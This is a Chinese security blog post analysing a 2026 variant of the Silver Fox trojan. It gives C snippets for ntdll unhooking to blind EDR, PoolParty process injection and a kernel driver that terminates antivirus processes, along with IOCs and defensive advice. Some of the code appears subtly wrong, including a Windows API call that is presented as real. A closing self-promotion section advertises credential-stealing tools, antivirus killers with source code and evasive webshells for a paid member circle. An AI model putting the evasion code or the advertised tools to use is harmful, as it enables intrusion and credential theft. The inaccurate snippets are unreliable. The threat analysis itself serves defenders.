文章总结: 银狐木马2026年升级版采用自编写内核驱动绕过微软黑名单,结合Unhooking技术致盲EDR并关闭11种杀软进程。攻击链包含用户态覆盖ntdll.text节解除Hook及内核态驱动级持久化,93.19%受害企业在攻击前无感知。防御建议包括启用内核保护、行为检测和邮件安全演练。 综合评分: 87 文章分类: 恶意软件,漏洞分析,威胁情报,红队,终端安全
让全球杀软集体失效!银狐木马2026年重磅升级:自编写驱动+Unhooking双链路攻击
原创
星夜AI安全 星夜AI安全
星夜AI安全
2026年6月17日 10:53 吉林
在小说阅读器读本章
去阅读
🌈
银狐木马2026年3月攻击活动全面升级,自行编写内核驱动绕过微软黑名单,Unhooking+PoolParty双重技术致盲EDR,可关闭360、火绒、腾讯电脑管家等11种杀软
让全球杀软集体失效!银狐木马2026年重磅升级:自编写驱动+Unhooking双链路攻击
2026年3月,一个让所有安全从业者警惕的信号出现:银狐木马攻击活动在春节后全面复活,新变种捕获量突破500个,传播范围和对抗强度双双超越2025年最高水平。
更令人不安的是,这批新变种不再依赖现有的漏洞驱动,而是自行编写内核驱动程序,签署合法数字签名,绕过微软黑名单拦截,可关闭360安全卫士、火绒、腾讯电脑管家、金山毒霸等11种杀软和EDR进程。
这是一场由”拿来主义”升级为”自研武器”的质的飞跃。
一、技术全貌:双层攻击架构
银狐木马2026年最新变种采用了用户态+内核态双层攻击架构,每一层都有针对性的免杀技术:
1.1 用户态攻击链
钓鱼诱导下载 → 远端服务器拉取shellcode
↓
自定义解密算法 + LZNT1压缩解压
↓
读取磁盘ntdll.dll → 覆盖进程内已加载ntdll的.text节
↓
Unhooking致盲用户态EDR监控
↓
提权至管理员权限
↓
PoolParty进程注入 → 最终远控上线
1.2 内核态攻击链
释放自编写内核驱动 → 数字签名加持
↓
内核驱动加载(VMP加壳保护)
↓
双线程对抗:
├─ 对抗线程:异或解密杀软进程名 → 发送关闭指令
└─ 辅助线程:检查杀软存活 → 强制TerminateProcess
↓
彻底关闭11种杀软/EDR
↓
注入银狐远控Shellcode → 内核级持久化
二、为什么这个技术如此重要
2.1 绕过微软黑名单的范式转变
过去几年,黑产一直依赖现成的漏洞驱动(如BYOVD攻击),但微软通过黑名单机制对这些已知驱动进行拦截。银狐木马这次自行编写驱动,完全绕过了这一机制——因为黑名单里根本没有这些新编写的驱动。
这意味着:即使是及时更新了安全策略的企业,也可能因为这个”未知驱动”而沦陷。
2.2 从”能用”到”好用”的进化
自行编写驱动不仅仅是绕过检测,更意味着:
- 完全控制:可以精准关闭任意目标杀软进程
- 规避分析:VMP加壳让逆向分析变得极为困难
- 持久潜伏:内核级Rootkit比用户态木马更难清除
2.3 93.19%的失陷前无感知
据微步情报局统计,被银狐木马拉群攻击的企业中,93.19%在黑产开始行动前毫无感知。钓鱼邮件的精准度、免杀技术的高超,让传统邮件网关和终端防护都成了摆设。
三、技术原理解析
3.1 Unhooking技术:用户态致盲EDR
核心原理:EDR在ntdll.dll的关键函数上设置Inline Hook,监控敏感API调用(如NtWriteProcessMemory、NtCreateThread等)。银狐木马通过以下步骤解除这些Hook:
// 从磁盘读取干净的ntdll.dll
HMODULE hNtdll = LoadLibraryExA("C:\\Windows\\System32\\ntdll.dll", NULL,
DONT_RESOLVE_DLL_REFERENCES);
// 定位.text节的起始位置和大小
PIMAGE_SECTION_HEADER pSection = FindTextSection(hNtdll);
LPVOID pTextStart = (LPBYTE)hNtdll + pSection->VirtualAddress;
SIZE_T textSize = pSection->Misc.VirtualSize;
// 获取当前进程中已加载ntdll的.text节地址
HMODULE hCurrentNtdll = GetModuleHandleA("ntdll.dll");
LPVOID pCurrentText = (LPBYTE)hCurrentNtdll + pSection->VirtualAddress;
// 用磁盘上的干净ntdll覆盖当前进程的ntdll text节
// 这一步会覆盖EDR设置的Inline Hook
DWORD oldProtect;
VirtualProtect(pCurrentText, textSize, PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(pCurrentText, pTextStart, textSize);
VirtualProtect(pCurrentText, textSize, oldProtect, &oldProtect);
效果:EDR设置的Hook被干净代码覆盖,NtWriteProcessMemory等敏感调用不再触发告警。
3.2 PoolParty进程注入技术
核心原理:利用Windows线程池的PostQueuedCompletionStatus函数,向目标进程(通常是svchost.exe)的I/O完成端口投递一个伪造的异步I/O操作,趁机将shellcode注入目标进程。
// 创建目标进程的shellcode注入孔洞
SIZE_T shellcodeSize = 0x1000;
LPVOID pRemoteAlloc = VirtualAllocEx(hTargetProcess, NULL, shellcodeSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
// 获取目标进程的I/O完成端口
HANDLE hIOCP = GetProcessIoCompletionPort(hTargetProcess);
// 投递伪造的异步操作,触发shellcode执行
PostQueuedCompletionStatus(hIOCP, shellcodeSize, 0,
(LPOVERLAPPED)pRemoteAlloc);
效果:Shellcode在目标进程中执行,建立远控连接,全程无敏感API调用,行为隐蔽。
3.3 自编写驱动:内核级杀软对抗
这是本轮升级最核心的技术。驱动编写者不再依赖已知漏洞驱动,而是:
步骤一:编写内核驱动程序,实现以下功能:
- 遍历进程链表,找到目标杀软的进程对象
- 向进程对象发送终止信号
步骤二:使用合法数字签名证书签署驱动(可能通过代码签名证书购买或第三方签名服务)
步骤三:使用VMP(Virtual Machine Protection)等壳进行加壳保护,防止静态和动态分析
// 内核驱动中的杀软进程关闭逻辑
VOID DisableSecuritySoftware(ULONG targetPid) {
PEPROCESS pEprocess;
PsLookupProcessByProcessId((HANDLE)targetPid, &pEprocess);
// 关闭进程 - 内核权限执行,杀软无法拦截
PsTerminateProcess(pEprocess, STATUS_SUCCESS);
}
// 用户态对抗线程调用
VOID AntiAvThread() {
while (TRUE) {
// 11种异或函数之一解密杀软进程名
char* processName = XorDecrypt(g_encryptedNames[GetCurrentIndex()]);
// 获取进程PID
ULONG pid = GetProcessIdByName(processName);
if (pid != 0) {
// 发送给内核驱动关闭
SendToKernelDriver(pid);
}
Sleep(100); // 100ms检查周期
}
}
四、实战应用场景
4.1 钓鱼邮件攻击链
攻击者使用空壳公司注册钓鱼域名(上百个),仿冒税务、补贴、福利等平台,通过搜索引擎优化提升曝光度。
用户访问钓鱼网站后,触发”系统版本过低”虚假弹窗,诱导下载”升级客户端”——实际上是银狐木马。
4.2 针对性渗透
对于高价值目标(如金融、政务机构),攻击者可能结合:
- 社工欺骗(伪装HR发送简历类邮件)
- 水坑攻击(入侵目标常访问的行业网站)
- 供应链攻击(入侵相关软件供应商)
4.3 持久化控制
成功感染后,银狐木马会:
- 注册表Run键持久化
- 计划任务定时激活
- 内核驱动常驻(即使重装系统也可能残留)
五、防御对抗建议
5.1 终端防护层
- 启用内核保护:部分EDR支持内核态监控,可检测异常驱动加载
- 应用白名单:限制非签名驱动加载(需配合IT管理策略)
- 行为检测:关注异常的
PostQueuedCompletionStatus调用和ntdll覆盖行为
5.2 网络层
- 出口流量监控:银狐木马需要与C2服务器通信,异常外连应触发告警
- DNS安全:监控解析到已知恶意域名的请求
5.3 邮件安全
- 钓鱼模拟演练:提升员工对社工邮件的识别能力
- 邮件附件沙箱检测:在安全环境中执行附件,观察行为
5.4 应急响应
- 内核驱动白名单:定期审计已加载的驱动,标记未知驱动
- 杀软进程监控:监控360Tray.exe、HipsTray.exe等关键进程是否异常退出
六、技术延伸阅读
工具与资源
| 名称 | 链接 | 说明 | | — | — | — | | 微步威胁情报库 | https://x.threatbook.com/[1] | 银狐木马IOC持续更新 | | VirusTotal | https://www.virustotal.com/[2] | 样本检测和上传分析 | | ANY.RUN | https://any.run/[3] | 在线沙箱,行为分析 |
IOC指标
钓鱼域名:
xxs.sckca.tophldfke.comxxs.z3m4.top
远控地址:
- IP:
95.40.29.190:8880 - IP:
16.163.105.153:8880 - IP:
183.90.186.193:5050
银狐木马的进化速度远超大多数企业的防护能力提升。 面对这种”自研武器化”的攻击趋势,传统的签名检测已经远远不够——企业需要转向行为检测、威胁情报联动和内核级防护的立体防御体系。
如果你所在企业正在使用Oracle PeopleSoft,请立即检查是否暴露在公网,并参考我们另一篇文章的应急处置指南。
圈子介绍
现任职于某头部网络安全企业攻防研究部,核心红队成员。2021-2023年间累计参与40+场国家级、行业级攻防实战演练,精通漏洞挖掘、红蓝对抗策略制定、恶意代码分析、内网横向渗透及应急响应等技术领域。在多次大型演练中,主导突破多个高防护目标网络,曾获”最佳攻击手””突出贡献个人”等荣誉。
已产出的安全工具及成果包括:
- 多款主流杀软通杀工具(兼容卡巴斯基、诺顿、瑞星、360等终端防护,无感知运行,突破多引擎联合检测)
- XXByPassBehinder v1.1 冰蝎免杀生成器(定制化冰蝎免杀工具,绕过主流终端防护与EDR动态检测,支持自定义载荷)
- 哥斯拉二开免杀定制版(二开优化,深度免杀,突破终端防护与EDR检测,适配多场景植入)
- NeoCS4.9终极版(高级免杀加载工具,强化载荷注入与进程劫持,适配多系统版本,无兼容问题)
- WinDump_免杀版(浏览器凭证窃取工具,支持Chrome/Edge/Firefox等主流浏览器,一键提取敏感数据,免杀过防护)
- DumpBrowser_V1_免杀版(浏览器凭证窃取工具,专攻浏览器密码、Cookie、历史记录提取,免杀性能拉满)
- fscan二开版(二开优化内网扫描工具,增强指纹精度、弱口令爆破与结果标准化输出,适配复杂内网)
- RingQ加载器二开版(二开优化免杀加载器,支持Shellcode内存执行,绕过各类终端防护与EDR检测)
- 多款免杀Webshell集合(覆盖PHP/JSP/ASPX,过主流WAF与终端防护,适配不同Web场景)
- 免杀360专属加载器(支持Shellcode内存执行,针对性绕过360全系防护检测,无感知运行)
- 一键Kill 火绒 defender 工具 HDKiller(包含源码)
- win11 一键kill 360工具 InjectKill(包含源码)
- win11 一键kill defender工具win11_df-killer(包含源码)
- 免杀火绒6.0内存防护加载器BypassMemLoader
后续将不断更新到内部圈子中 欢迎加入圈子
引用链接
[1]https://x.threatbook.com/
[2]https://www.virustotal.com/
[3]https://any.run/
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:星夜AI安全 星夜AI安全 星夜AI安全《让全球杀软集体失效!银狐木马2026年重磅升级:自编写驱动+Unhooking双链路攻击》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论